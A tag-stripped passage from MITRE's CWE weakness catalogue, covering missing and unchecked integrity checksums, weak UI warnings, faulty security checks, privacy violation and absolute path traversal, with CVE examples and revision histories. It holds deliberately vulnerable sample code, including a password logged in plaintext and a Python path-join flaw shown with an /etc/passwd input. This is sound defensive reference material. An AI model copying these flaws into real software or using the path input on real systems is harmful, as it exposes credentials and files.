Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Applicable_Platforms, Description, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Theoretical_Notes + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + Tom Stracener + 2009-05-20 + Added demonstrative example for profile. + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-02-16 + updated Applicable_Platforms, Detection_Factors, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationship_Notes, Research_Gaps + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships, Theoretical_Notes + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum. + If integrity check values or "checksums" are omitted from a protocol, there is no way of determining if data has been corrupted in transmission. The lack of checksum functionality in a protocol removes the first application-level check of data that can be used. The end-to-end philosophy of checks states that integrity checks should be performed at the lowest level that they can be completely implemented. Excluding further sanity checks and input validation performed by applications, the protocol's checksum is the most important level of checksum, since it can be performed more completely than at any previous level and takes into account entire messages, as opposed to single packets. + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + Medium + + + Integrity + Other + Other + Data that is parsed and used may be corrupted. + + + Non-Repudiation + Other + Hide Activities + Other + Without a checksum it is impossible to determine if any changes have been made to the data after it was sent. + + + + + Architecture and Design + Add an appropriately sized checksum to the protocol, ensuring that data received may be simply validated before it is parsed and used. + + + Implementation + Ensure that the checksums present in the protocol design are properly implemented and added to each message before it is sent. + + + + + In this example, a request packet is received, and privileged information is sent to the requester: + + while(true) {DatagramPacket rp = new DatagramPacket(rData,rData.length);outSock.receive(rp);InetAddress IPAddress = rp.getAddress();int port = rp.getPort();out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out, out.length, IPAddress, port);outSock.send(sp);} + + The response containing secret data has no integrity check associated with it, allowing an attacker to alter the message without detection. + + + + + Failure to add integrity check value + + + Part 2-4 + Req SP.03.03 RE(1) + + + Part 2-4 + Req SP.04.02 RE(1) + + + Part 2-4 + Req SP.11.06 RE(2) + + + Part 3-3 + Req SR 3.1 + + + Part 4-1 + Req SD-1 + + + Part 4-2 + Req CR 3.1 + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Demonstrative_Examples + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + Failure to Add Integrity Check Value + + + + The product does not validate or incorrectly validates the integrity check values or "checksums" of a message. This may prevent it from detecting if the data has been modified or corrupted in transmission. + Improper validation of checksums before use results in an unnecessary risk that can easily be mitigated. The protocol specification describes the algorithm used for calculating the checksum. It is then a simple matter of implementing the calculation and verifying that the calculated checksum and the received checksum match. Improper verification of the calculated checksum and the received checksum can lead to far greater consequences. + + + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Integrity + Other + Modify Application Data + Other + Integrity checks usually use a secret key that helps authenticate the data origin. Skipping integrity checking generally opens up the possibility that new data from an invalid source can be injected. + + + Integrity + Other + Other + Data that is parsed and used may be corrupted. + + + Non-Repudiation + Other + Hide Activities + Other + Without a checksum check, it is impossible to determine if any changes have been made to the data after it was sent. + + + + + Implementation + Ensure that the checksums present in messages are properly checked in accordance with the protocol specification before they are parsed and used. + + + + + The following example demonstrates the weakness. + + sd = socket(AF_INET, SOCK_DGRAM, 0); serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv));while (1) { + + memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen); + } + + + while(true) {DatagramPacket packet = new DatagramPacket(data,data.length,IPAddress, port);socket.send(sendPacket);} + + + + + + Failure to check integrity check value + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Check Integrity Check Value + + + + The product's user interface does not warn the user before undertaking an unsafe action on behalf of that user. This makes it easier for attackers to trick users into inflicting damage to their system. + Product systems should warn users that a potentially dangerous action may occur if the user proceeds. For example, if the user downloads a file from an unknown source and attempts to execute the file on their machine, then the application's GUI can indicate that the file is unsafe. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Non-Repudiation + Hide Activities + + + + + CVE-1999-1055 + Product does not warn user when document contains certain dangerous functions or macros. + https://www.cve.org/CVERecord?id=CVE-1999-1055 + + + CVE-1999-0794 + Product does not warn user when document contains certain dangerous functions or macros. + https://www.cve.org/CVERecord?id=CVE-1999-0794 + + + CVE-2000-0277 + Product does not warn user when document contains certain dangerous functions or macros. + https://www.cve.org/CVERecord?id=CVE-2000-0277 + + + CVE-2000-0517 + Product does not warn user about a certificate if it has already been accepted for a different site. Possibly resultant. + https://www.cve.org/CVERecord?id=CVE-2000-0517 + + + CVE-2005-0602 + File extractor does not warn user it setuid/setgid files could be extracted. Overlaps privileges/permissions. + https://www.cve.org/CVERecord?id=CVE-2005-0602 + + + CVE-2000-0342 + E-mail client allows bypass of warning for dangerous attachments via a Windows .LNK file that refers to the attachment. + https://www.cve.org/CVERecord?id=CVE-2000-0342 + + + + + Product UI does not warn user of unsafe actions + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Often resultant, e.g. in unhandled error conditions. + Can overlap privilege errors, conceptually at least. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The user interface provides a warning to a user regarding dangerous or sensitive operations, but the warning is not noticeable enough to warrant attention. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Non-Repudiation + Hide Activities + + + + + CVE-2007-1099 + User not sufficiently warned if host key mismatch occurs + https://www.cve.org/CVERecord?id=CVE-2007-1099 + + + + + Insufficient UI warning of dangerous operations + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique. + + + + + + + + + + + + Architecture and Design + + + Implementation + + This is an implementation error, in which the algorithm/technique requires certain security-related behaviors or conditions that are not implemented or checked properly, thus causing a vulnerability. + + + + + + Access Control + Bypass Protection Mechanism + + + + + CVE-2002-0862 + Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates. + https://www.cve.org/CVERecord?id=CVE-2002-0862 + + + CVE-2002-0970 + Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates. + https://www.cve.org/CVERecord?id=CVE-2002-0970 + + + CVE-2002-1407 + Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates. + https://www.cve.org/CVERecord?id=CVE-2002-1407 + + + CVE-2005-0198 + Logic error prevents some required conditions from being enforced during Challenge-Response Authentication Mechanism with MD5 (CRAM-MD5). + https://www.cve.org/CVERecord?id=CVE-2005-0198 + + + CVE-2004-2163 + Shared secret not verified in a RADIUS response packet, allowing authentication bypass by spoofing server replies. + https://www.cve.org/CVERecord?id=CVE-2004-2163 + + + CVE-2005-2181 + Insufficient verification in VoIP implementation, in violation of standard, allows spoofed messages. + https://www.cve.org/CVERecord?id=CVE-2005-2181 + + + CVE-2005-2182 + Insufficient verification in VoIP implementation, in violation of standard, allows spoofed messages. + https://www.cve.org/CVERecord?id=CVE-2005-2182 + + + CVE-2005-2298 + Security check not applied to all components, allowing bypass. + https://www.cve.org/CVERecord?id=CVE-2005-2298 + + + + + Improperly Implemented Security Check for Standard + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is a "missing step" error on the product side, which can overlap weaknesses such as insufficient verification and spoofing. It is frequently found in cryptographic and authentication errors. It is sometimes resultant. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Modes_of_Introduction, Observed_Examples, Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly prevent a person's private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected. + + There are many types of sensitive information that products must protect from attackers, including system data, communications, configuration, business secrets, intellectual property, and an individual's personal (private) information. Private personal information may include a password, phone number, geographic location, personal messages, credit card number, etc. Private information is important to consider whether the person is a user of the product, or part of a data set that is processed by the product. An exposure of private information does not necessarily prevent the product from working properly, and in fact the exposure might be intended by the developer, e.g. as part of data sharing with other organizations. However, the exposure of personal private information can still be undesirable or explicitly prohibited by law or regulation. + Some types of private information include: + + Government identifiers, such as Social Security Numbers + Contact information, such as home addresses and telephone numbers + Geographic location - where the user is (or was) + Employment history + Financial data - such as credit card numbers, salary, bank accounts, and debts + Pictures, video, or audio + Behavioral patterns - such as web surfing history, when certain activities are performed, etc. + Relationships (and types of relationships) with others - family, friends, contacts, etc. + Communications - e-mail addresses, private messages, text messages, chat logs, etc. + Health - medical conditions, insurance status, prescription records + Account passwords and other credentials + + Some of this information may be characterized as PII (Personally Identifiable Information), Protected Health Information (PHI), etc. Categories of private information may overlap or vary based on the intended usage or the policies and practices of a particular industry. + Sometimes data that is not labeled as private can have a privacy implication in a different context. For example, student identification numbers are usually not considered private because there is no explicit and publicly-available mapping to an individual student's personal information. However, if a school generates identification numbers based on student social security numbers, then the identification numbers should be considered private. + + + + + + + + + + + Privacy violation + + + Privacy leak + + + Privacy leakage + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + Operation + + + + + Confidentiality + Read Application Data + + + + + Architecture or Design Review + + Private personal data can enter a program in a variety of ways: + + Directly from the user in the form of a password or personal information + Accessed from a database or other data store by the application + Indirectly from a partner or other third party + + If the data is written to an external location - such as the console, file system, or network - a privacy violation may occur. + + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Requirements + + Identify and consult all relevant regulations for personal privacy. An organization may be required to comply with certain federal and state regulations, depending on its location, the type of business it conducts, and the nature of any private data it handles. Regulations may include Safe Harbor Privacy Framework [REF-340], Gramm-Leach Bliley Act (GLBA) [REF-341], Health Insurance Portability and Accountability Act (HIPAA) [REF-342], General Data Protection Regulation (GDPR) [REF-1047], California Consumer Privacy Act (CCPA) [REF-1048], and others. + + + + Architecture and Design + + Carefully evaluate how secure design may interfere with privacy, and vice versa. Security and privacy concerns often seem to compete with each other. From a security perspective, all important operations should be recorded so that any anomalous activity can later be identified. However, when private data is involved, this practice can in fact create risk. Although there are many ways in which private data can be handled unsafely, a common risk stems from misplaced trust. Programmers often trust the operating environment in which a program runs, and therefore believe that it is acceptable store private information on the file system, in the registry, or in other locally-controlled resources. However, even if access to certain resources is restricted, this does not guarantee that the individuals who do have access can be trusted. + + + + + + The following code contains a logging statement that tracks the contents of records added to a database by storing them in a log file. Among other values that are stored, the getPassword() function returns the user-supplied plaintext password associated with the account. + + pass = GetPassword();...dbmsLog.WriteLine(id + ":" + pass + ":" + type + ":" + tstamp); + + The code in the example above logs a plaintext password to the filesystem. Although many developers trust the filesystem as a safe storage location for data, it should not be trusted implicitly, particularly when privacy is a concern. + + + This code uses location to determine the user's current US State location. + First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml: + + <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> + + During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible: + + locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation); + + While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in. + + + In 2004, an employee at AOL sold approximately 92 million private customer e-mail addresses to a spammer marketing an offshore gambling web site [REF-338]. In response to such high-profile exploits, the collection and management of private data is becoming increasingly regulated. + + + + + Privacy Violation + + + FIO13-J + Do not log sensitive information outside a trust boundary + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry overlaps many other entries that are not organized around the kind of sensitive information that is exposed. However, because privacy is treated with such importance due to regulations and other factors, and it may be useful for weakness-finding tools to highlight capabilities that detect personal private information instead of system information, it is not clear whether - and how - this entry should be deprecated. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Other_Notes + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-12-28 + updated Other_Notes, References + + + CWE Content Team + MITRE + 2010-02-16 + updated Other_Notes, References + + + CWE Content Team + MITRE + 2011-03-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Other_Notes, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, References + + + CWE Content Team + MITRE + 2014-02-18 + updated Alternate_Terms, Demonstrative_Examples, Description, Name, Other_Notes, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Potential_Mitigations, References, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Privacy Violation + Exposure of Private Information ('Privacy Violation') + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as "/abs/path" that can resolve to a location that is outside of that directory. + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + + + + + + + + + + + Implementation + + + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries. + + + Integrity + Modify Files or Directories + The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication. + + + Confidentiality + Read Files or Directories + The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system. + + + Availability + DoS: Crash, Exit, or Restart + The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the product from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the product. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + In the example below, the path to a dictionary file is read from a system property and used to initialize a File object. + + String filename = System.getProperty("com.domain.application.dictionaryFile");File dictionaryFile = new File(filename); + + However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory. + + + This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an error is printed to the user. + + + import os + import sys + def main(): + + filename = sys.argv[1] + path = os.path.join(os.getcwd(), filename) + try: + + with open(path, 'r') as f: + + file_data = f.read() + + + except FileNotFoundError as e: + + print("Error - file not found") + + + main() + + + However, if the user supplies an absolute path, the os.path.join() function will discard the path to the current working directory and use only the absolute path provided. For example, if the current working directory is /home/user/documents, but the user inputs /etc/passwd, os.path.join() will use only /etc/passwd, as it is considered an absolute path. In the above scenario, this would cause the script to access and read the /etc/passwd file. + + + import os + import sys + def main(): + + filename = sys.argv[1] + path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}") + try: + + with open(path, 'r') as f: + + file_data = f.read() + + + except FileNotFoundError as e: + + print("Error - file not found") + + + main() + + + The constructed path string uses os.sep to add the appropriate separation character for the given operating system (e.g. '\' or '/') and the call to os.path.normpath() removes any additional slashes that may have been entered - this may occur particularly when using a Windows path. By putting the pieces of the path string together in this fashion, the script avoids a call to os.path.join() and any potential issues that might arise if an absolute path is entered. With this version of the script, if the current working directory is /home/user/documents, and the user inputs /etc/passwd, the resulting path will be /home/user/documents/etc/passwd. The user is therefore contained within the current working directory as intended. + + + + + CVE-2022-31503 + Python package constructs filenames using an unsafe os.path.join call on untrusted input, allowing absolute path traversal because os.path.join resets the pathname to an absolute path that is specified as part of the input. + https://www.cve.org/CVERecord?id=CVE-2022-31503 + + + CVE-2002-1345 + Multiple FTP clients write arbitrary files via absolute paths in server responses + https://www.cve.org/CVERecord?id=CVE-2002-1345 + + + CVE-2001-1269 + ZIP file extractor allows full path + https://www.cve.org/CVERecord?id=CVE-2001-1269 + + + CVE-2002-1818 + Path traversal using absolute pathname + https://www.cve.org/CVERecord?id=CVE-2002-1818 + + + CVE-2002-1913 + Path traversal using absolute pathname + https://www.cve.org/CVERecord?id=CVE-2002-1913 + + + CVE-2005-2147 + Path traversal using absolute pathname + https://www.cve.org/CVERecord?id=CVE-2005-2147 + + + CVE-2000-0614 + Arbitrary files may be overwritten via compressed attachments that specify absolute path names for the decompressed output. + https://www.cve.org/CVERecord?id=CVE-2000-0614 + + + CVE-1999-1263 + Mail client allows remote attackers to overwrite arbitrary files via an e-mail message containing a uuencoded attachment that specifies the full pathname for the file to be modified. + https://www.cve.org/CVERecord?id=CVE-1999-1263 + + + CVE-2003-0753 + Remote attackers can read arbitrary files via a full pathname to the target file in config parameter. + https://www.cve.org/CVERecord?id=CVE-2003-0753 + + + CVE-2002-1525 + Remote attackers can read arbitrary files via an absolute pathname. + https://www.cve.org/CVERecord?id=CVE-2002-1525 + + + CVE-2001-0038 + Remote attackers can read arbitrary files by specifying the drive letter in the requested URL. + https://www.cve.org/CVERecord?id=CVE-2001-0038 + + + CVE-2001-0255 + FTP server allows remote attackers to list arbitrary directories by using the "ls" command and including the drive letter name (e.g. C:) in the requested pathname. + https://www.cve.org/CVERecord?id=CVE-2001-0255 + + + CVE-2001-0933 + FTP server allows remote attackers to list the contents of arbitrary drives via a ls command that includes the drive letter as an argument. + https://www.cve.org/CVERecord?id=CVE-2001-0933 + + + CVE-2002-0466 + Server allows remote attackers to browse arbitrary directories via a full pathname in the arguments to certain dynamic pages. + https://www.cve.org/CVERecord?id=CVE-2002-0466 + + + CVE-2002-1483 + Remote attackers can read arbitrary files via an HTTP request whose argument is a filename of the form "C:" (Drive letter), "//absolute/path", or ".." . + https://www.cve.org/CVERecord?id=CVE-2002-1483 + + + CVE-2004-2488 + FTP server read/access arbitrary files using "C:\" filenames + https://www.cve.org/CVERecord?id=CVE-2004-2488 + + + CVE-2001-0687 + FTP server allows a remote attacker to retrieve privileged web server system information by specifying arbitrary paths in the UNC format (\\computername\sharename). + https://www.cve.org/CVERecord?id=CVE-2001-0687 + + + + + Absolute Path Traversal + + + SFP16 + Path Traversal + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 